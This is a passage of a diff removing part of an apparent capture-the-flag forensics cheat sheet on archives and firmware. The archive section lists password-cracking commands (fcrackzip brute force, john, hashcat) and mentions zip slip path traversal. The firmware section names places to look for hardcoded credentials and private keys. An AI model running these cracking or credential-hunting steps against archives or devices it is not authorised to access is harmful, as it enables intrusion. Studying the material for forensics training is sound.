- → chronological view of file access/modification/creation
273
- ```
274
-
275
- ## Archive Analysis
276
-
277
- ```
278
- Archive forensics:
279
- ├── ZIP:
280
- │ ├── unzip -l archive.zip → list contents without extracting
281
- │ ├── zipinfo archive.zip → detailed structure
282
- │ ├── Known-plaintext attack: pkcrack → crack if partial content known
283
- │ ├── fcrackzip -b -c 'aA1!' -l 1-8 archive.zip → brute force
284
- │ ├── john --format=zip hash.txt → John the Ripper (zip2john first)
285
- │ └── Zip slip: path traversal via ../../ in filenames
286
- ├── RAR:
287
- │ ├── rar2john archive.rar > hash.txt → extract hash
288
- │ └── hashcat -m 13000 hash.txt wordlist → crack
289
- ├── 7z:
290
- │ └── 7z l -slt archive.7z → detailed listing
291
- ├── tar/gz/bz2:
292
- │ ├── tar tf archive.tar → list contents
293
- │ └── Check timestamp/permissions for clues
294
- └── Nested archives:
295
- Multiple compression layers (zip inside gz inside tar)
296
- → automate: write script to recursively extract until flag found
297
- ```
298
-
299
- ## Firmware Analysis
300
-
301
- ```
302
- ├── binwalk -e firmware.bin → extract filesystem
303
- ├── firmware-mod-kit → unpack/repack firmware
304
- ├── Common filesystems: squashfs, jffs2, cramfs, yaffs2
305
- │ unsquashfs extracted/squashfs → mount squashfs
306
- ├── Look for:
307
- │ ├── /etc/shadow or /etc/passwd → hardcoded credentials
308
- │ ├── /etc/config/* → configuration files with secrets
309
- │ ├── *.key, *.pem → private keys
310
- │ ├── Web interface source code → vulnerabilities
311
- │ └── Compiled binaries → reverse engineer
312
- └── Emulation: qemu or firmadyne → run firmware for dynamic analysis
313
- ```